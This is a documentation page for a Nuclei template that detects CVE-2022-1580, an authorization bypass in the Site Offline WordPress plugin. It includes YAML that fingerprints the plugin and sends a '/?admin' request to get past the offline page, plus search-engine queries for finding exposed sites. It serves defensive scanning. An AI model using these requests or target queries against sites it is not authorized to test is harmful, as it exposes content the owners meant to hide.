Skip to content
Nuclei Templates

Site Offline WP Plugin < 1.5.3 - Authorization Bypass

ID: CVE-2022-1580

Severity: medium

Author: s4e-io

Tags: cve,cve2022,wpscan,site-offline,wordpress,wp-plugin,wp,freehtmldesigns

Description

Section titled “Description”

The plugin prevents users from accessing a website but does not do so if the URL contained certain keywords. Adding those keywords to the URL’s query string would bypass the plugin’s main feature.

YAML Source

Section titled “YAML Source”
id: CVE-2022-1580


info:
  name: Site Offline WP Plugin < 1.5.3 - Authorization Bypass
  author: s4e-io
  severity: medium
  description: |
    The plugin prevents users from accessing a website but does not do so if the URL contained certain keywords. Adding those keywords to the URL's query string would bypass the plugin's main feature.
  remediation: Fixed in 1.5.3
  reference:
    - https://wpscan.com/vulnerability/7b6f91cd-5a00-49ca-93ff-db7220d2630a/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1580
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2022-1580
    cwe-id: CWE-639
    epss-score: 0.00069
    epss-percentile: 0.29862
    cpe: cpe:2.3:a:freehtmldesigns:site_offline:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: freehtmldesigns
    product: "site_offline"
    framework: wordpress
    publicwww-query: "/wp-content/plugins/site-offline/"
    shodan-query: http.html:/wp-content/plugins/site-offline/
    fofa-query: body=/wp-content/plugins/site-offline/
  tags: cve,cve2022,wpscan,site-offline,wordpress,wp-plugin,wp,freehtmldesigns
flow: http(1) && http(2)


http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/site-offline/readme.txt"


    matchers:
      - type: word
        internal: true
        words:
          - "Site Offline Or Coming Soon Or Maintenance Mode"


  - method: GET
    path:
      - "{{BaseURL}}/?admin"


    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "wp-block", "author")'
          - "status_code == 200"
        condition: and
# digest: 4a0a00473045022100ef5d5af472ff438511a64ef20b5ea40d5c6a57b2b6dc8ffb1c3f5e7139a29055022014f01af9b8b7deeff1f11411dbffe7e98e1f6998917f5be0b8c33a435478767f:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-1580.yaml"

View on Github